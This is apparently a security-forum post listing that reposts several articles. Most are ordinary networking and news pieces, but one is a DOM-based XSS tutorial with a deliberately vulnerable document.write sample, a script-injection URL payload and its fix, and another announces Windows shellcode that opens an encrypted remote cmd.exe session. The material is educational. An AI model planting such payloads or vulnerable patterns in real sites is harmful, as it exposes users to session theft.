Everything posted by Nytro
-
Debugging a weird network problem (or: IPv6 privacy addresses, just say no)

All you folks who followed my blog for food porn are going to want to skip this one.

The past ten days have been pretty horrible for me at work, thanks to the combined effect of five different network issues. One particularly difficult one to track down has been affecting the very access switch that serves my own office, and that makes it particularly frustrating (especially when trying to fight other fires). The particular symptom that we observed was that traffic would slow down for a short period — about 15 seconds, just long enough to notice but not long enough to actually track down the source of the problem. It was clear from looking at interface statistics that there was some sort of broadcast or multicast storm going on.

Early on, one particular network drop looked suspicious: when the slowdown occurred, we could see that the switch port was receiving a high rate of traffic (hundreds or even thousands of packets per second) and that these were being replicated to all or nearly all the other ports on that switch. When other switches started to trigger the same sort of alerts in our monitoring system, I physically unplugged that drop and things appeared to get better — but I still had no idea why. And things only appeared to get better: there were still slowdowns; they just weren’t as severe (and thus as noticeable) as before.

The access layer in our network is composed of Juniper EX4200 switches, and thanks to Junos’s FreeBSD heritage, they have much better observability than most other switches. In particular, you can run start shell from the Junos command line and get a standard Unix shell (well, csh actually, which while non-standard is “standard enough” for most usual administrative tasks).
There are some limitations: Juniper’s kernel will only execute signed binaries, for example, so you can’t install your own software on the switches (although Juniper offers an SDK for some platforms). But Junos includes a number of standard FreeBSD utilities, including netstat, tar, and (relevant for this discussion) top. So I was able to log in to the problem switch and monitor exactly what was going on CPU-wise. Here’s what a normal EX4200 looks like:

last pid: 26547;  load averages: 0.08, 0.12, 0.14    up 110+05:09:57  22:16:09
48 processes:  1 running, 47 sleeping
CPU states:  5.1% user,  0.0% nice,  4.6% system,  0.2% interrupt, 90.0% idle
Mem: 390M Active, 67M Inact, 47M Wired, 190M Cache, 110M Buf, 286M Free
Swap:

  PID USERNAME  THR PRI NICE   SIZE    RES STATE    TIME   WCPU COMMAND
 1374 root        2  44  -52 72584K 19100K select 237.3H  3.66% sfid
 1376 root        1   8    0 86884K 33716K nanslp 129.9H  1.12% pfem
 1373 root        1   4    0 68052K 11804K kqread  53.9H  0.00% chassism
 1424 root        1   4    0 10204K  6084K kqread  30.9H  0.00% mcsnoopd
 1393 root        1   4    0 23896K 15808K kqread 560:19  0.00% eswd
 1402 root        1  96    0 28968K 14992K select 420:57  0.00% mib2d
 1422 root        1   4    0 17320K  9716K kqread 273:08  0.00% lldpd
 1375 root        1   4  -20 14240K  8588K kqread 240:56  0.00% vccpd
 1401 root        1  96    0 22184K 16388K select 215:18  0.00% snmpd
 1426 root        1  96    0 12356K  6940K select 163:18  0.00% license-ch

This is just a standard FreeBSD top command, from about the 7.0 era, so it accepts the S and H flags to show system processes and threads, respectively, but in this case that didn’t add any useful information. When things were hosed, yes, there was a process (mcsnoopd, the multicast snooping daemon) that was taking up a lot of CPU, but it was only getting 30% of the processor — the other 60% was being absorbed by “system” time and not attributable to any particular process or thread.

Seeing this, but being frustratingly unable to truly identify the source of the problem, I opened a JTAC case.
The technician gave me a script to run, which totally failed to identify the problem. (JTAC’s debugging scripts are apparently spread around cargo-cult fashion, and the JTAC staff don’t actually understand what they do or have any idea how to debug them — in this case, the script I was given would never have found this issue because it was looking at the wrong place in the output of top -b — but it was impossible to explain this to the tech over email. The script itself was clearly a horrible hacked-together farrago of awk (twice) and grep and sed (twice) to do something which could have been easily done in a single line of awk script by someone who was actually competent.)

Eventually we had a phone call and for once the Juniper “secure meeting” functionality worked. (I keep an old Thinkpad running Windows in my office for this purpose, since “secure meeting” doesn’t usually work on any other platform.) I was able to convince the tech (after two days of waiting for this script to find something) that it wasn’t going to work, and he moved on to another debugging step — one that should have occurred to me, but when you’re under stress you often don’t think of the obvious.

One of the other FreeBSD tools that Junos includes is tcpdump (there’s even an interface to it in the Junos command line), so you can actually take a packet capture directly on the switch, save it to the switch’s internal flash, and then scp it somewhere else for analysis. The one drawback with this is that it can only see the packets that hit the switch’s CPU — anything that’s switched in hardware doesn’t get seen by BPF — but that’s actually an advantage when you’re trying to identify something that’s clobbering the switch’s CPU. We took a packet capture, and I uploaded it to JTAC so the tech could look at it while I was still on the phone, but there wasn’t anything that looked like it could possibly be the source of the problem.
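As an aside, the kind of check the author says should have been a single line of awk really is one. A sketch (the sample line is copied from the top output quoted earlier; on the switch you would pipe `top -b` into awk instead of echoing a canned line, and the field layout is assumed to match that output):

```shell
# Pull the idle percentage out of top's "CPU states:" line.
line='CPU states:  5.1% user,  0.0% nice,  4.6% system,  0.2% interrupt, 90.0% idle'
echo "$line" | awk -F'[ ,%]+' '/^CPU states:/ {
    for (i = 1; i < NF; i++)
        if ($(i+1) == "idle") print $i
}'
# prints 90.0
```

A threshold check (say, flag the sample when idle drops below 20%) is one more comparison inside the same awk block, with no need for the grep/sed pipeline the JTAC script used.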
So we ended the call with the conclusion that I would continue to watch the switch and take a packet capture when the problem was actually happening. It didn’t take long — as it turned out, the problem condition was actually quite deterministic, and repeated every 125 seconds! So I had no trouble getting those captures, and after uploading them to JTAC I opened each one up in Wireshark and had a look for myself.

What immediately caught my attention was a long stream of IPv6 multicasts that overwhelmed all other traffic for about ten seconds — suspiciously similar to the 15-second period of the slowdown I had been watching in top. I saw that these were all IPv6 Multicast Listener Discovery packets, which are part of the ICMPv6 protocol and take the place of the IPv4 IGMP protocol — they are used by routers to identify which hosts are members of which multicast groups, so that only desired multicast traffic is forwarded down a network interface. I could see that the burst of multicasts was immediately preceded by an all-groups solicitation coming from one of our core switches, so that all seemed normal, and the solicitation itself actually said “please splay your responses over the next 10,000 milliseconds”, which explained why the burst lasted for almost exactly that length of time. The multicast groups being reported, in nearly all cases, were the so-called “solicited node” multicast groups, which are part of IPv6’s (mandatory) Neighbor Discovery Protocol — the way nodes on a network find out their neighbors’ layer-2 addresses, analogous to ARP in IPv4.

If this was just normal behavior, why exactly was it causing such problems? Surely Juniper had plenty of customers who were using IPv6 in production networks, so they must have tested this software. And why was the mcsnoopd process involved for IPv6 traffic? I started reading up on tuning parameters for MLD, reasoning that maybe the defaults were just wrong for a network of our size.
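To make the “solicited node” mechanics concrete: RFC 4291 forms the group ff02::1:ffXX:XXXX from the low 24 bits of the unicast address, so every distinct address a host configures implies one more multicast group membership. A small illustrative sketch (the helper and its inputs are mine, not from the article), taking the final two 16-bit groups of an address:

```javascript
// Compute the solicited-node multicast group for an IPv6 address,
// given the last two 16-bit groups of that address (illustrative helper).
function solicitedNode(g7, g8) {
  // keep the low 24 bits: the low byte of the 7th group plus all of the 8th
  const lowByte = g7 & 0xff;
  return "ff02::1:ff" + lowByte.toString(16).padStart(2, "0") +
         ":" + g8.toString(16).padStart(4, "0");
}

// e.g. an address ending in ...:abcd:ef12 joins ff02::1:ffcd:ef12
console.log(solicitedNode(0xabcd, 0xef12)); // "ff02::1:ffcd:ef12"
```

This is also why a host holding hundreds of privacy addresses answers an MLD query with hundreds of reports: each random interface ID lands in a different solicited-node group.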
We had done a software update on all of our access switches during the spring. One of the new features added in Junos 12.1 (to which we had upgraded) was support for “MLD snooping”. This was the IPv6 analogue to “IGMP snooping”, which we did have configured. (In IGMP snooping, a layer-2 switch like ours listens to the layer-3 IGMP traffic, and even forges its own IGMP messages to make them look like they came from a router, to determine on a port-by-port basis which multicast groups are subscribed. Otherwise, it would have to flood all multicasts to all ports, which would take far more bandwidth and more interconnect resources on the switch, so even though it’s a “layering violation”, it’s a necessity in all but the smallest networks. MLD snooping does exactly the same thing, but for IPv6.)

I thought that maybe not having MLD snooping configured was causing some sort of problem — perhaps the mcsnoopd process was taking an abnormal amount of CPU when faced with MLD packets that it didn’t know what to do with, or perhaps (since MLD packets themselves are also multicast) it was just doing the flooding in software rather than allowing the switch hardware to do it. In any event, I turned on MLD snooping for all VLANs on the switch, and the CPU spikes simply stopped. Coincidence? I’ll wait and see — but since more and more machines have IPv6 on by default, I’ll be deploying MLD snooping everywhere I can (regardless of whether it really helps my issue or not).

So I went home, and made dinner (well, actually, a bowl of macaroni and cheese). But I was still thinking about this issue at work. The JTAC technician sent me email, after I had left work, pointing to an issue on some HP machines running Windows with a bad NIC driver. We don’t have many HP machines, so I initially dismissed the idea, but since I could run Wireshark just as easily at home as in the office, I scp’ed the trace files from my workstation and had a look.
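For reference, turning on MLD snooping for all VLANs on an EX switch is a one-line configuration change. A sketch of the Junos syntax (mirroring the igmp-snooping stanza; verify against your Junos release before committing):

```
[edit]
user@switch# set protocols mld-snooping vlan all
user@switch# commit
```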
Opening up one of the traces in Wireshark, I used Statistics => Endpoint list => Ethernet to find which Ethernet addresses had sent the most traffic, and one jumped out at me immediately: a Dell machine on my network had sent the second-highest number of multicast or broadcast packets in this several-minute capture. It was second only to the core switch that was busily ARPing away for non-existent IPv4 addresses. (We have a lot of address space, and it’s all on the public Internet, so we get scanned pretty much continually.) I logged in to the switch, and located the port where it connected, and lo and behold, it was on the same port as I had originally suspected! I used Wireshark’s filtering capability to get an idea of what the machine was, and what exactly it was doing sending all of those packets. That told me the identity of the machine — it was a Windows machine, and Windows loves to broadcast its identity to all and sundry — and more to the point, I saw that it was responsible for the vast majority of those multicast memberships: 350 different multicast groups in all, nearly all of which were “solicited node” groups for different IPv6 “privacy” addresses.

Now for a digression on IPv6 addressing. An IPv6 address is 128 bits long. That is enough addresses to give billions of addresses to every cell in the body of every human on earth. Of course, there’s no reason you’d do that, and a lot of the address space is “wasted” by giving it a structure that makes it practical to actually route IPv6 packets on a global scale. By convention, the top 64 bits of an IPv6 address identify a specific network, and the bottom 64 bits are an “interface identifier”, which identifies the particular device attached to that network.

Some bright light looked at this and said, oh, gee, all those users are used to dialup in the IPv4 Internet where they get a different address every time they turn their computer on, so we’d better find a way to emulate that in IPv6.
Unfortunately, they did, and thus “privacy” addresses were born — where the device identifier (technically called an “interface ID” since it’s usually specific to the NIC) is just randomly generated, and changes every so often. That way, nobody will ever have to worry about some bad guy on the IPv6 Internet identifying them by their MAC address. (Duh, they’ll just use the “network” part of the IPv6 address instead!) Of course that will also ensure that nobody will ever have to care about making the IPv6 reverse DNS work properly, either, since nobody will use the same address from one day to the next.

Microsoft turned this “feature” on by default in recent versions of Windows. (Apple turned it on in Mac OS and iOS as well, but that’s a rant for another day.) Apparently the Windows implementation is more aggressive, or Windows applications are more likely to hold connections open, because there are lots of reports of Windows machines having hundreds of these “privacy” addresses simultaneously — and that’s what appears to be happening on our problem machine: every time the router sent out a “please tell me all your memberships in the next 10 seconds” message, the Windows box would reply with 30 MLD responses a second for ten seconds.

That doesn’t seem like much, but now that I’ve started turning MLD snooping on, I can see that there are other VLANs in my network that look like they are having the same problem — so I have my work cut out for me. Luckily, there’s a really simple set of commands to completely disable “privacy” addresses on Windows machines (for whatever reason, Microsoft doesn’t provide a GUI for this), so now that I know what to look for, I can identify the problem machines and get their owners to fix them. Still, grrr.

Sursa: Debugging a weird network problem (or: IPv6 privacy addresses, just say no) | Occasionally Coherent
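The "really simple set of commands" the author alludes to are, to my knowledge, the netsh invocations below, run from an elevated prompt on the Windows machine; `randomizeidentifiers` controls the random interface ID and `privacy` controls the temporary addresses. Treat this as a sketch and check the behavior on your Windows version:

```
netsh interface ipv6 set privacy state=disabled store=persistent
netsh interface ipv6 set global randomizeidentifiers=disabled store=persistent
```

With both disabled, the host falls back to a stable interface identifier and stops accumulating temporary addresses (and thus solicited-node group memberships) over time.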
-
How Russian Hackers Stole the Nasdaq
By Michael Riley
July 17, 2014

In October 2010, a Federal Bureau of Investigation system monitoring U.S. Internet traffic picked up an alert. The signal was coming from Nasdaq (NDAQ). It looked like malware had snuck into the company’s central servers. There were indications that the intruder was not a kid somewhere, but the intelligence agency of another country. More troubling still: When the U.S. experts got a better look at the malware, they realized it was attack code, designed to cause damage.

As much as hacking has become a daily irritant, much more of it crosses watch-center monitors out of sight from the public. The Chinese, the French, the Israelis—and many less well known or understood players—all hack in one way or another. They steal missile plans, chemical formulas, power-plant pipeline schematics, and economic data. That’s espionage; attack code is a military strike. There are only a few recorded deployments, the most famous being the Stuxnet worm. Widely believed to be a joint project of the U.S. and Israel, Stuxnet temporarily disabled Iran’s uranium-processing facility at Natanz in 2010. It switched off safety mechanisms, causing the centrifuges at the heart of a refinery to spin out of control. Two years later, Iran destroyed two-thirds of Saudi Aramco’s computer network with a relatively unsophisticated but fast-spreading “wiper” virus. One veteran U.S. official says that when it came to a digital weapon planted in a critical system inside the U.S., he’s seen it only once—in Nasdaq.

The October alert prompted the involvement of the National Security Agency, and just into 2011, the NSA concluded there was a significant danger. A crisis action team convened via secure videoconference in a briefing room in an 11-story office building in the Washington suburbs.
Besides a fondue restaurant and a CrossFit gym, the building is home to the National Cybersecurity and Communications Integration Center (NCCIC), whose mission is to spot and coordinate the government’s response to digital attacks on the U.S. They reviewed the FBI data and additional information from the NSA, and quickly concluded they needed to escalate. Thus began a frenzied five-month investigation that would test the cyber-response capabilities of the U.S. and directly involve the president. Intelligence and law enforcement agencies, under pressure to decipher a complex hack, struggled to provide an even moderately clear picture to policymakers. After months of work, there were still basic disagreements in different parts of government over who was behind the incident and why.

“We’ve seen a nation-state gain access to at least one of our stock exchanges, I’ll put it that way, and it’s not crystal clear what their final objective is,” says House Intelligence Committee Chairman Mike Rogers, a Republican from Michigan, who agreed to talk about the incident only in general terms because the details remain classified. “The bad news of that equation is, I’m not sure you will really know until that final trigger is pulled. And you never want to get to that.”

Bloomberg Businessweek spent several months interviewing more than two dozen people about the Nasdaq attack and its aftermath, which has never been fully reported. Nine of those people were directly involved in the investigation and national security deliberations; none were authorized to speak on the record. “The investigation into the Nasdaq intrusion is an ongoing matter,” says FBI New York Assistant Director in Charge George Venizelos.
“Like all cyber cases, it’s complex and involves evidence and facts that evolve over time.”

While the hack was successfully disrupted, it revealed how vulnerable financial exchanges—as well as banks, chemical refineries, water plants, and electric utilities—are to digital assault. One official who experienced the event firsthand says he thought the attack would change everything, that it would force the U.S. to get serious about preparing for a new era of conflict by computer. He was wrong.

On the call at the NCCIC were experts from the Defense, Treasury, and Homeland Security departments and from the NSA and FBI. The initial assessment provided the incident team with a few sketchy details about the hackers’ identity, yet it only took them minutes to agree that the incursion was so serious that the White House should be informed. The conference call participants reconvened at the White House the next day, joined by officials from the Justice and State departments and the Central Intelligence Agency. The group drew up a set of options to be presented to senior national security officials from the White House, the Justice Department, the Pentagon, and others. Those officials determined the questions that investigators would have to answer: Were the hackers able to access and manipulate or destabilize the trading platform? Was the incursion part of a broader attack on the U.S. financial infrastructure?

The U.S. Secret Service pushed to be the lead investigative agency. Its representatives noted that they had already gone to Nasdaq months earlier with evidence that a group of alleged Russian cybercriminals, led by a St. Petersburg man named Aleksandr Kalinin, had hacked the company and that the two events might be related. The Secret Service lost the argument and sat the investigation out.

Sursa: How Russian Hackers Stole the Nasdaq - Businessweek
-
DOM Based Cross-site Scripting Vulnerability
Tue, 15 Jul 2014, by Ferruh Mavituna

Today Cross-site Scripting (XSS) is a well known web application vulnerability among developers, so there is no need to explain what XSS is. The most important part of a Cross-site Scripting attack developers should understand is its impact; an attacker can steal or hijack your session, carry out very successful phishing attacks and effectively can do anything that the victim can.

DOM Based XSS simply means a Cross-site scripting vulnerability that appears in the DOM (Document Object Model) instead of part of the HTML. In reflective and stored Cross-site scripting attacks you can see the vulnerability payload in the response page, but in DOM based cross-site scripting the HTML source code and response of the attack will be exactly the same, i.e. the payload cannot be found in the response. It can only be observed at runtime or by investigating the DOM of the page.

Simple DOM Based Cross-site Scripting Vulnerability Example

Imagine the following page http://www.example.com/test.html contains the below code:

<script>
document.write("<b>Current URL</b> : " + document.baseURI);
</script>

If you send an HTTP request like this http://www.example.com/test.html#<script>alert(1)</script>, simple enough, your JavaScript code will get executed, because the page is writing whatever you typed in the URL to the page with the document.write function. If you look at the source of the page, you won’t see <script>alert(1)</script> because it’s all happening in the DOM and done by the executed JavaScript code. After the malicious code is executed by the page, you can simply exploit this DOM based cross-site scripting vulnerability to steal the cookies of the user or change the page’s behaviour as you like.

DOM XSS Vulnerability is a Real Threat

Various research and studies identified that up to 50% of websites are vulnerable to DOM Based XSS vulnerability.
Security researchers have already identified DOM Based XSS issues in high profile internet companies such as Google, Yahoo and Alexa.

Server Side Filters Do Not Matter

One of the biggest differences between DOM Based XSS and Reflected or Stored XSS vulnerabilities is that DOM Based XSS cannot be stopped by server-side filters. The reason is quite simple: anything written after the "#" (hash) will never be sent to the server. Historically, the fragment identifier, a.k.a. hash, was introduced to simply scroll the HTML page to a certain element; however, it was later adopted by JavaScript developers for use in AJAX pages to keep track of pages and various other things, mostly referred to as the hash-bang "#!". Due to this design, anything after the hash won’t be sent to the server. This means all server-side protection in the code will not work for DOM Based XSS vulnerabilities. As a matter of fact, any other type of web protection, such as web application firewalls, or generic framework protections like ASP.NET Request Validation, will not protect you against DOM Based XSS attacks.

Input & Output, the So-Called Source & Sink

The logic behind DOM XSS is that an input from the user (source) goes to an execution point (sink). In the previous example our source was document.baseURI and the sink was document.write. What you need to understand, though, is that DOM XSS will appear when a source that can be controlled by the user is used in a dangerous sink. So when you see this, either you need to make the necessary code changes to avoid being vulnerable to DOM XSS, or you need to add encoding accordingly. Below is a list of sources and sinks which are typically targeted in DOM XSS attacks. Note that this is not a complete list, but you can figure out the pattern: anything that can be controlled by an attacker is a source, and anything that can lead to script execution is a sink.
Popular Sources

document.URL
document.documentURI
location.href
location.search
location.*
window.name
document.referrer

Popular Sinks

HTML modification sinks:
  document.write
  (element).innerHTML
HTML modification sinks leading to behaviour change:
  (element).src (in certain elements)
Execution related sinks:
  eval
  setTimeout / setInterval
  execScript

Fixing DOM Cross-site Scripting Vulnerabilities

The best way to fix DOM based cross-site scripting is to use the right output method (sink). For example, if you want to use user input to write in a <div> element, don’t use innerHTML; instead use innerText/textContent. This will solve the problem, and it is the right way to remediate DOM based XSS vulnerabilities. It is always a bad idea to use user-controlled input in dangerous sinks such as eval. 99% of the time it is an indication of bad or lazy programming practice, so simply don’t do it instead of trying to sanitize the input. Finally, to fix the problem in our initial code, instead of trying to encode the output correctly, which is a hassle and can easily go wrong, we would simply use element.textContent to write it in a content like this:

<b>Current URL:</b> <span id="contentholder"></span>
<script>
document.getElementById("contentholder").textContent = document.baseURI;
</script>

It does the same thing, but this time it is not vulnerable to DOM based cross-site scripting vulnerabilities.

Sursa: https://www.netsparker.com/blog/web-security/dom-based-cross-site-scripting-vulnerability/
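The article's warning that output encoding "can easily go wrong" is worth illustrating. If an HTML sink truly cannot be avoided, the input must be HTML-escaped first. A minimal sketch of such an escaper (illustrative only; in practice prefer textContent or a vetted encoding library):

```javascript
// Escape the five HTML metacharacters so user input is inert in an HTML sink.
function escapeHtml(s) {
  return s.replace(/&/g, "&amp;")   // must run first, or it re-escapes the rest
          .replace(/</g, "&lt;")
          .replace(/>/g, "&gt;")
          .replace(/"/g, "&quot;")
          .replace(/'/g, "&#39;");
}

console.log(escapeHtml('<script>alert(1)</script>'));
// "&lt;script&gt;alert(1)&lt;/script&gt;"
```

Note that escaping is context-sensitive: an attribute, URL, or JavaScript-string context each needs different rules, which is exactly why a text sink like textContent is the safer default.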
-
Win32 and Win64 Shellcodes

Introduction

'Hidden' is a 32-bit shellcode written for Windows that uses RSA key exchange and robust encryption to hide data transmitted between 2 computers. It consists of a client (the shellcode) and a server. The client will create a cmd.exe process which then accepts data sent to it by the server over an encrypted channel. Tested on the 32-bit version of Windows XP, and on 64-bit Windows 7 and Server 2012.

PDF: https://github.com/cmpxchg8/shellcode/blob/master/win32/hs/Hidden%20Shellcode%20for%20Windows.pdf?raw=true

Sursa: https://github.com/cmpxchg8/shellcode (win32/hs)
-
[h=1]FakeNet – Windows Network Simulation Tool For Malware Analysis[/h]

FakeNet is a Windows Network Simulation Tool that aids in the dynamic analysis of malicious software. The tool simulates a network so that malware interacting with a remote host continues to run, allowing the analyst to observe the malware’s network activity from within a safe environment.

The goals of the project are to:

- Be easy to install and use; the tool runs on Windows and requires no 3rd party libraries
- Support the most common protocols used by malware
- Perform all activity on the local machine to avoid the need for a second virtual machine
- Provide Python extensions for adding new or custom protocols
- Keep the malware running so that you can observe as much of its functionality as possible
- Have a flexible configuration, but no required configuration

The tool is in its infancy of development. The team started working on the tool in January 2012 and intends to maintain the tool and add new and useful features. If you find a bug or have a cool feature you think would improve the tool, please do contact them.

Features

- Supports DNS, HTTP, and SSL
- HTTP server always serves a file and tries to serve a meaningful file; if the malware requests a .jpg then a properly formatted .jpg is served, etc. The files being served are user configurable.
- Ability to redirect all traffic to the localhost, including traffic destined for a hard-coded IP address.
- Python extensions, including a sample extension that implements SMTP and SMTP over SSL.
- Built-in ability to create a capture file (.pcap) for packets on localhost.
- Dummy listener that will listen for traffic on any port, auto-detect and decrypt SSL traffic and display the content to the console.

Right now the tool only supports WinXP Service Pack 3. The tool runs fine on Windows Vista/7, although certain features will be automatically disabled.

You can download FakeNet here: Fakenet1.0c.zip

Or read more here.
Sursa: http://www.digitalmunition.net/?p=2984
-
[h=1]IDA Dalvik debugger: tips and tricks[/h]

Posted on July 11, 2014 by Nikolay Logvinov

One of the new features of IDA 6.6 is the Dalvik debugger, which allows us to debug Dalvik binaries on the bytecode level. Let us see how it can help when analysing Dalvik files.

[h=2]Encoded strings[/h]

Let us consider a package with encrypted strings:

STRINGS:0001F143 unk_1F143: .byte 0x30 # 0       # DATA XREF: STR_IDS:off_70
STRINGS:0001F144 aFda8sohchnidgh: .string "FDA8sOhCHNidghM2hzFxMXUsivl2k7hFOhkJrW7O2ml8qLVM",0
STRINGS:0001F144                                 # DATA XREF: q_b@V
STRINGS:0001F144                                 # String #277 (0x115)
STRINGS:0001F175 unk_1F175: .byte 0x3C # <       # DATA XREF: STR_IDS:off_70
STRINGS:0001F176 aCgv01n8li2s3ok: .string "CGv01N8li2s3OKN29j6exe6-rvzgIRaCcWoOt5y30zjP1k43-f7WVOtXjbg="
STRINGS:0001F176                                 # DATA XREF: q_b@V+C

There is a data reference; let us see where this string is used (e.g. using Ctrl-X).

CODE:000090C0 const-string v0, aFda8sohchnidgh  # "FDA8sOhCH"...
CODE:000090C4 invoke-static {v0}, <ref RC4.decryptBase64(ref) RC4_decryptBase64@LL>
CODE:000090CA move-result-object v0

So, apparently the strings are encrypted with RC4+Base64. Let us set a breakpoint after the RC4.decryptBase64() call and start the debugger. After hitting the breakpoint, open the “Locals” debugger window. Even if the application was stripped of debug information, IDA makes the best effort to show the function’s input arguments and return value. Note the local variable named retval. It is a synthetic variable created by IDA to show the function return value. This is how we managed to decode the string contents.

[h=3]How to debug Dalvik and ARM code together[/h]

Let us have a look at an application that uses a native library. On a button press, the function stringFromJNI() implemented in the native library is called.
package ida.debug.hellojni;

public class MainActivity extends Activity {
    public native String stringFromJNI();

    static {
        System.loadLibrary("hello-jni");
    }

    @Override
    public void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        final TextView tv = new TextView(this);
        final Button btn = new Button(this);
        btn.setText("Press me to call the native code");
        btn.setOnClickListener(new Button.OnClickListener() {
            public void onClick(View v) {
                tv.setText(stringFromJNI());
            }
        });
        LinearLayout layout = new LinearLayout(this);
        layout.setOrientation(LinearLayout.VERTICAL);
        layout.setLayoutParams(new LayoutParams(
            LayoutParams.FILL_PARENT, LayoutParams.FILL_PARENT));
        layout.addView(btn);
        layout.addView(tv);
        setContentView(layout);
    }
}

The native library function returns a well-known string.

jstring Java_ida_debug_hellojni_MainActivity_stringFromJNI(JNIEnv* env, jobject thiz)
{
    return (*env)->NewStringUTF(env, "Hello, JNI world!");
}

So, we have the application packaged in the hellojni.apk file and installed in the Android Emulator. Because IDA cannot analyse or debug both Dalvik and native (ARM) code at the same time, we’ll need to use two IDA instances to perform debugging in turns.

To prepare the first IDA instance:

- load hellojni.apk into IDA, select classes.dex to analyze.
- go to the native function call and set a breakpoint there.

CODE:0000051C iget-object v0, this, MainActivity$1_val$tv
CODE:00000520 iget-object v1, this, MainActivity$1_this$0
CODE:00000524 invoke-virtual {v1}, <ref MainActivity.stringFromJNI() imp. @ _def_MainActivity_stringFromJNI@L>
CODE:0000052A move-result-object v1

- change the default port in “Debugger/Process options” to any other value.
- start the Dalvik debugger and wait until the breakpoint is hit.

Then prepare the second IDA instance:

- prepare to debug a native ARM Android application (copy and start android_server and so on).
- load hellojni.apk into IDA, and now select lib/armeabi-v7a/libhello-jni.so to analyze.
- the name of the native function was formed by special rules, and in our case it is Java_ida_debug_hellojni_MainActivity_stringFromJNI(), so go to it and set a breakpoint:

.text:00000BC4     EXPORT Java_ida_debug_hellojni_MainActivity_stringFromJNI
.text:00000BC4 Java_ida_debug_hellojni_MainActivity_stringFromJNI
.text:00000BC4
.text:00000BC4 var_C = -0xC
.text:00000BC4 var_8 = -8
.text:00000BC4
.text:00000BC4     STMFD   SP!, {R11,LR}
.text:00000BC8     ADD     R11, SP, #4
.text:00000BCC     SUB     SP, SP, #8
.text:00000BD0     STR     R0, [R11,#var_8]
.text:00000BD4     STR     R1, [R11,#var_C]
.text:00000BD8     LDR     R3, [R11,#var_8]
.text:00000BDC     LDR     R3, [R3]
.text:00000BE0     LDR     R2, [R3,#0x29C]
.text:00000BE4     LDR     R0, [R11,#var_8]
.text:00000BE8     LDR     R3, =(aHelloJniWorld - 0xBF4)
.text:00000BEC     ADD     R3, PC, R3      ; "Hello, JNI world!"
.text:00000BF0     MOV     R1, R3
.text:00000BF4     BLX     R2
.text:00000BF8     MOV     R3, R0
.text:00000BFC     MOV     R0, R3
.text:00000C00     SUB     SP, R11, #4
.text:00000C04     LDMFD   SP!, {R11,PC}
.text:00000C04 ; End of function Java_ida_debug_hellojni_MainActivity_stringFromJNI

- select “Remote ARM Linux/Android debugger” and attach to the application process.
- press F9 to continue.

Now switch to the first IDA session and press, for example, F8 to call the native function. If we return to the second IDA session, we can notice the breakpoint event. Now we can continue to debug the native code. When we finish, press F9 and return to the first IDA session.

You can download the full source code of the example from our site.

Sursa: IDA Dalvik debugger: tips and tricks | Hex Blog
-
Apache httpd mod_status Heap Buffer Overflow Remote Code Execution Vulnerability
ZDI-14-236: July 16th, 2014

CVE ID: CVE-2014-0226
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Affected Vendors: Apache
Affected Products: HTTPD Server 2.x

Vulnerability Details
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of the Apache HTTPD server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the updating of mod_status. A race condition in mod_status allows an attacker to disclose information or corrupt memory through multiple requests to endpoints served by the server-status handler and to other endpoints. By abusing this flaw, an attacker can possibly disclose credentials or leverage the situation to achieve remote code execution.

Vendor Response
Apache has issued an update to correct this vulnerability. More details can be found at: svn commit: r1610499 - in /httpd/httpd/branches/2.4.x: ./ CHANGES include/ap_mmn.h include/scoreboard.h modules/generators/mod_status.c modules/lua/lua_request.c server/scoreboard.c

Disclosure Timeline
2014-05-30 - Vulnerability reported to vendor
2014-07-16 - Coordinated public release of advisory

Credit
This vulnerability was discovered by: AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466 and Marek Kroemeke

Sursa: Zero Day Initiative
-
[h=1]Access OS X's Secret Terminal Hidden in the Login Screen[/h]
Thorin Klosowski

If you ever need to enter console commands without logging all the way into the desktop, Macworld has an old tip that shows you how to get access to the Terminal without going through the whole login process.
All you need to do is type >console into the username field of the login screen, and you'll get dumped into a Terminal screen. Here, you can run pretty much any commands you need without logging all the way into the desktop. You still need a login and password to do anything, but it's a nice way to get quick access to your computer. This should work in pretty much all modern versions of OS X.

Sursa: Access OS X's Secret Terminal Hidden in the Login Screen
-
New IP-based wireless networking protocol created Recognizing the need for a better way to connect products in the home, seven companies announced that they’ve joined forces to develop Thread, a new IP-based wireless networking protocol. Thread Group founding members consist of industry-leading companies including Yale Security, Silicon Labs, Samsung Electronics, Nest Labs, Freescale Semiconductor, Big Ass Fans and ARM. While currently available 802.15.4 networking technologies have their own advantages, each also has critical issues that prevent the promise of the Internet of Things (IoT) from being realized. These include lack of interoperability, inability to carry IPv6 communications, high power requirements that drain batteries quickly, and “hub and spoke” models dependent on one device (if that device fails, the whole network goes down). With Thread, product developers and consumers can securely connect more than 250 devices into a low-power, wireless mesh network that also includes direct Internet and cloud access for every device. “Existing wireless networking approaches were introduced long before the Internet of Things gained ground,” said Vint Cerf, vice president and chief Internet evangelist, Google, and advisor to the Thread Group. “The Thread protocol takes existing technologies and combines the best parts of each to provide a better way to connect products in the home.” “A number of networking solutions and platforms have been introduced to address the growing demand for connected products in the home,” said Lisa Arrowsmith, associate director, connectivity, smart homes and smart cities, IHS Technology. “Built on well-proven standards, including IEEE 802.15.4, IETF IPv6 and 6LoWPAN, Thread represents a resilient, IP-based solution for the rapidly growing Internet of Things.” Unlike many existing technologies or IoT approaches, Thread is not an application protocol or a connectivity platform for many types of disparate networks. 
Thread is an IPv6 networking protocol built on open standards, designed for low-power 802.15.4 mesh networks. Existing popular application protocols and IoT platforms can run over Thread networks. A version of Thread is already being used successfully in Nest products today. Thread offers product developers technological advantages over existing wireless standards:

Reliable networks: Thread offers robust self-healing mesh networks that scale to hundreds of devices with no single point of failure. Devices are ready when people need them.
Secure networks: Thread networks feature secure, banking-class encryption. Thread closes identified security holes found in other wireless protocols and provides worry-free operation.
Simple connectivity: Thread devices are simple to install with a smartphone, tablet or computer. Consumers can securely connect Thread devices in the home to each other and to the cloud for easy control and access from anywhere.
Low power: Thread supports battery-operated devices as part of a home network. This allows the devices that people use every day -- including thermostats, lighting controls, safety and security products -- to be a part of the network without requiring constant charging or frequent battery changes.

Millions of existing 802.15.4 wireless devices already on the market can run Thread with just a software enhancement -- no new hardware required. Thread is designed for quick implementation and deployment of devices throughout the home.

Sursa: New IP-based wireless networking protocol created
-
AFD.SYS DANGLING POINTER VULNERABILITY

TABLE OF CONTENTS
Affected OS
Overview
Impact
Technical Analysis
    POC code
    Vulnerability Analysis
        Step 1 - IOCTL 0x1207f
